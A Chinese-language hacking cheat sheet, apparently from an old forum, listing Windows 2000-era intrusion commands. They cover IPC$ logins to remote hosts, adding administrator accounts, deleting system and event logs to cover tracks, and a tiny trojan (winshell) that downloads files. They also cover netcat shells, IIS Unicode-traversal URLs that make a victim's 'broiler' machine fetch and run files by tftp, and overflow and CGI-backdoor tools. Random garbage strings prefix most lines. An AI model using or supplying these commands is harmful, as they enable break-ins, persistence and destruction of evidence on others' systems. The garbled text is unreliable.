网管和黑客都必须知道的命令
%y>+1hakkX 常用的几条NET命令:
pprejUR czI{qi5N (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
mj@31YW n@
4@, (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
4r\*@rq eOt%x Tx (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
Jen%}\ Uo2+:p (查看远程主机时间) net time \\IP地址
Vvyj MM#i t=u (定时启动某个程序) at \\IP地址 02:18 readme.exe
mzGjRl=O 1?(cmXj (查看共享) net view \\IP地址
;7rd;zJ 4QE=f(u;h (查看netbios工作组列表) nbtstat -A IP地址
7{pIPmJ /HkFlfPd (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
bni)Qw ;o[rQ6+ (这两条把自己增加到管理员组): net user 用户名 密码 /add
g<$. - g /s:w^g~ net localgroup Administrators 用户名 /add
)CLf;@1 y;nvR6) (断开连接) net use \\IP地址\ipc$ /delete
r|
f-_D ca(U!T68 扫尾:
`?|Rc EUy(T1Cl&& del C:\winnt\system32\logfiles\*.*
#--olEj! .n`( X#,*l del C:\winnt\ssytem32\config\*.evt
:?=Q39O9 XA)'=L!^ del C:\winnt\system32\dtclog\*.*
RNTa XR+Zn rVH6QQF=\ del C:\winnt\system32\*.log
Stxp3\jEn q\Rq!7( del C:\winnt\system32\*.txt
SWs3SYJ\ ydQ!4 del C:\winnt\*.txt
wiJRCH CvK3H\.&;k del C:\winnt\*.log
qbiK^gR _A{+H^, 一、netsvc.exe
ZQAO"huk] :"<e0wDu[ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
@'i+ff\ ;F5"}x netsvc /list \\IP地址
<~{du ?4n *%\mZ,s" netsvc schedule \\IP地址 /query
5qbq,#Pf jvHFFSK netsvc \\IP地址 schedule /start
NQX>Qh
2 o0ZBi|U\4 二、OpenTelnet.exe
S8" f]5s i%;"[M 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Z/<#n\>t0> NvJV</l6A OpenTelnet \\IP地址 用户名 密码 1 7878
0C$8g
Y* 0(y:$ 然后就可以telnet到主机的7878端口,进入DOS方式下:
T#EFXHPr #y1Bx, telnet IP地址 7878
L0Y0&;y|R =gjDCx$| 三、winshell.exe
53Yxz3v pJBg?D 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
kz B\'m,l +
P7o4]:/ p Path (查看winshell主程序的路径信息)
7 [d? ~_>cM c b reBoot (重新启动机器)
M;jcUX_{ m%QSapV d shutDown (关闭机器)
;3"@g]e VUtXxvH s Shell (执行后你就会看到可爱的“C:\>”)
5u$ D/*
Eb &!L:"]=+ x eXit (退出本次登录会话,此命令并不终止winshell的运行)
P4k;O?y #.._c?%4/ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
Y$<D9fs3 pKT2^Q}-h 四、3389登陆器,GUI方式登录远程主机的
]Gv!M?: RWKH%C[Yd 五、elsave.exe
FhkkWWL +G*JrwJ&= 事件日志清除工具
c_.-b=zm ""% A'TZ elsave -s \\IP地址 -l "application" -C
3qaMO#{M .Z\Q4x#!Z elsave -s \\IP地址 -l "system" -C
YoKs:e2/: $f$|6jM elsave -s \\IP地址 -l "security" -C
sy/nESZs sOBu7!G% 执行后成功清除应用程序日志,系统日志,安全日志
f>polxB%N Kj3?ve~ 六、hbulot.exe
'cBBt $s-Y%gc 开启win2kserver和winxp的3389服务
PuL<^aJ G[,Q95`w?< hbulot [/r]
X~oK[Nf'9 ik.A1j9oN 使用/r表示安装完成后自动重起目标使设置生效。
0 1V^L} iW%8/$ 七、nc.exe(netcat.exe)
R=]d%L8 xQ4%e[/ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
u92^(| J00VTb` 想要连接到某处: nc [-options] hostname port[s] [ports] ...
o!c]
( x/
*-P
b-_ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
LWfqEL
- Gl}Qxv#$ 参数:
j%IF2p2 7zemr>sIh -e prog 程序重定向,一旦连接,就执行 [危险!!]
wkUlrL/~ "IQ/LbOqm_ -g gateway source-routing hop point[s], up to 8
=elpH^N ZcJ\ZbE| -G num source-routing pointer: 4, 8, 12, ...
KNLnn;l O%8 EZyu -h 帮助信息
a^U~0i@[S ~;]W T -i secs 延时的间隔
nkfZiyx f+_h !j -l 监听模式,用于入站连接
^T::-pN* iBTYY{-wF -n 指定数字的IP地址,不能用hostname
"A$!,
PX6 t. ='/`!N -o file 记录16进制的传输
QX4ai3v !%)F J:p -p port 本地端口号
$D'-k]E[H (Qo I<j"" -r 任意指定本地及远程端口
{X(:jAy 9H-|FNz?c -s addr 本地源地址
@a:>$t wMqX)}> -u UDP模式
?iI4x%y ?L&'- e@ -v 详细输出——用两个-v可得到更详细的内容
l
vMlL5t hCjR&ZA -w secs timeout的时间
L>yJ W\&8auds -z 将输入输出关掉——用于扫描时
uN([*'0Cg 八、TFTPD32.EXE
}XO K,Hw SN7"7jo P< 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
SCvVt N ,8/Y http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
/+Lfrt AV9m_hZt 然后可以直接令文件运行:
n!p<A.O7@ l&iq5}[n& http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
s7Ub@ 6f')6X'x 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
)M6w5g 8V^oP]Y 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
=6"2UC& -gSUjP 一、一 Xscan命令行运行参数说明:
])xx<5Jt4 %?e& WLS 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
MrZh09y <B9C*M"4% 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
*s9C!wYMZ
d
,4]VE xscan -file <主机列表文件名> <检测项目> [其他选项]
LaQ-=;(` yKYTi3_( 其中<检测项目> 含义如下:
Hemq+]6^ o.0ci+z@ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
WI?oSE w *h}XWB C1q -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
uV!^,,~ Q09[[ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
gw,UQbnu ma"3qGy -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
U}[I
5$V_Hj -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
^h69Kr#d4 ZosP(Tdq [其他选项] 含义如下:
N[s}qmPha x>Zn?YR," -v: 显示详细扫描进度
NR`C(^} {zMU#=EC -p: 跳过Ping不通的主机
"?V0$-DR i_j[?.?X} -o: 跳过没有检测到开放端口的主机
:A/d to dBz/7&Q -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10